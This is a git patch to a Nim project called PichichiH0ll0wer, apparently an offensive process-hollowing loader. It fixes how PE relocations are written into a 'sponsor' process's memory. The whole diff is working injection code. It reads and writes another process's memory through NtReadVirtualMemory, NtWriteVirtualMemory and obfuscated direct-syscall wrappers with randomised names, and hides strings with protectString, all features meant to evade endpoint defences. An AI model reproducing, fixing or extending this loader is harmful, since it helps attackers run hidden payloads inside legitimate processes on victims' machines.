From dc1a55e32dbc24375ae676811a6bccc4d74d21bf Mon Sep 17 00:00:00 2001 From: Itay Migdal Date: Fri, 16 Feb 2024 22:01:03 +0200 Subject: [PATCH] fixed bug in relocations --- PichichiH0ll0wer/Loader/hollow123.nim | 2 +- PichichiH0ll0wer/Loader/reloc.nim | 48 +++++++++++++-------------- 2 files changed, 24 insertions(+), 26 deletions(-) diff --git a/PichichiH0ll0wer/Loader/hollow123.nim b/PichichiH0ll0wer/Loader/hollow123.nim index ceb0574..8731577 100644 --- a/PichichiH0ll0wer/Loader/hollow123.nim +++ b/PichichiH0ll0wer/Loader/hollow123.nim @@ -139,7 +139,7 @@ proc hollow123*(peStr: string, processInfoAddress: PPROCESS_INFORMATION): bool = when not defined(release): echo "[*] Allocating memory in sponsor process (preferred address)" var newImageBaseAddress = peImageImageBase res = CbZGEMmsvlfsZxPo( # NtAllocateVirtualMemory - 1, # sponsorProcessHandle, + sponsorProcessHandle, addr newImageBaseAddress, 0, addr peImageSize, diff --git a/PichichiH0ll0wer/Loader/reloc.nim b/PichichiH0ll0wer/Loader/reloc.nim index 4cbf185..c696058 100644 --- a/PichichiH0ll0wer/Loader/reloc.nim +++ b/PichichiH0ll0wer/Loader/reloc.nim @@ -14,9 +14,10 @@ type BASE_RELOCATION_BLOCK {.bycopy.} = object type PBASE_RELOCATION_ENTRY = ptr BASE_RELOCATION_ENTRY type PBASE_RELOCATION_BLOCK = ptr BASE_RELOCATION_BLOCK +proc NtReadVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToRead: SIZE_T, NumberOfBytesReaded: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.} + when defined(hollow1) or defined(hollow4): proc NtWriteVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToWrite: SIZE_T, NumberOfBytesWritten: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.} - proc NtReadVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToRead: SIZE_T, NumberOfBytesReaded: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.} when defined(hollow2) or defined(hollow5): include syscalls2 when defined(hollow3) or defined(hollow6): @@ -28,10 +29,8 @@ proc applyRelocations*(peBytesPtr: ptr byte, newImageBaseAddress: LPVOID, sponso var peImageSectionsHeader = cast[ptr IMAGE_SECTION_HEADER](cast[size_t](peImageNtHeaders) + sizeof(IMAGE_NT_HEADERS)) var peImageImageBase = cast[LPVOID](peImageNtHeaders.OptionalHeader.ImageBase) var dwDelta = cast[DWORD](cast[int](newImageBaseAddress) - cast[int](peImageImageBase)) - if dwDelta == 0: return true - for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)): if toString(peImageSectionsHeader[i].Name) == protectString(".reloc"): var dwRelocAddr = peImageSectionsHeader[i].PointerToRawData @@ -48,32 +47,31 @@ proc applyRelocations*(peBytesPtr: ptr byte, newImageBaseAddress: LPVOID, sponso continue var dwFieldAddress = pBlockheader.PageAddress + cast[DWORD](pBlocks[j].Offset) var dwBuffer: DWORD = 0 + if NtReadVirtualMemory( + sponsorProcessHandle, + cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), + addr dwBuffer, + cast[SIZE_T](sizeof(DWORD)), + NULL + ) != TRUE: + return false + dwBuffer += dwDelta when defined(hollow1) or defined(hollow4): - if NtReadVirtualMemory( - sponsorProcessHandle, - cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), + if NtWriteVirtualMemory( + sponsorProcessHandle, + cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), + addr dwBuffer, + cast[SIZE_T](sizeof(DWORD)), + NULL + ) != TRUE: + return false + when defined(hollow2) or defined(hollow3) or defined(hollow5) or defined(hollow6): + if nVcnEsSyWXtfrjav( + sponsorProcessHandle, + cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), addr dwBuffer, cast[SIZE_T](sizeof(DWORD)), NULL ) != TRUE: return false - dwBuffer += dwDelta - when defined(hollow1) or defined(hollow4): - if NtWriteVirtualMemory( - sponsorProcessHandle, - cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), - addr dwBuffer, - cast[SIZE_T](sizeof(DWORD)), - NULL - ) != TRUE: - return false - when defined(hollow2) or defined(hollow3) or defined(hollow5) or defined(hollow6): - if nVcnEsSyWXtfrjav( - sponsorProcessHandle, - cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), - addr dwBuffer, - cast[SIZE_T](sizeof(DWORD)), - NULL - ) != TRUE: - return false return true \ No newline at end of file